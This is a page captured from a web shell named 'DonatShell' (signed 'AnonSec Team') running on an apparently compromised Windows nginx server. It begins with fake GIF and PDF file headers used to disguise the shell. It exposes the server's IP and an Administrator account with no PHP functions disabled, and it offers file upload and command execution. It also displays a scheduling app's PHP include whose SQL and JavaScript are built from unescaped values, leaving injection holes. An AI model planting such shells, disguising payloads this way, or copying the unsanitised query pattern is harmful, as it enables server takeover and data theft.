GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Scheduler/Schedule/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Scheduler/Schedule/js_write_Schedule_SessionCurrent.phpinc
<?
// Schedule/js_write_Schedule_SessionCurrent.phpinc
// Set js variables needed for schedule management.

echo "
// BEGIN FILE ".basename(__FILE__)." ".currentDateTime().".";

t_Begin(); // Begin TRACKing js_write_Schedule.phpinc.

$jsText .= "
console.log('%c\t\t".basename(__FILE__)."','background-color:#000; color: #ccc;');";

// BEGIN SessionCurrent.
// Define js SessionCurrent{} object.
// Get session info.
$query = "
		SELECT YRTR
				 , sessionName
				 , sessionDescription
				 , sessionStart
				 , sessionEnd
				 , sessiontypeDescription
			FROM `session`
			JOIN `sessiontype` ON sessiontype.sessiontypeId = session.sessionType
		 WHERE sessionId = ".$scheduleInfo['sessionId']."
";
d_Var('sessionInfo',$query,'q');
$sessionInfo = query_info($query);
d_Var('$sessionInfo',$sessionInfo);
// Create and define the SessionCurrent{} object.
$jsText .= "\n"."
const SessionCurrent = { Id:".$scheduleInfo['sessionId'].", Name:'".$sessionInfo['sessionName']."', Description:'".$sessionInfo['sessionDescription']."', Start:'".$sessionInfo['sessionStart']."', End:'".$sessionInfo['sessionEnd']."', Type:'".$sessionInfo['sessiontypeDescription']."' }; ";
// END SessionCurrent.

echo "
// END FILE ".basename(__FILE__)."
";

t_End(); // End TRACKing js_write_Schedule.phpinc.
?>

Anon7 - 2022
AnonSec Team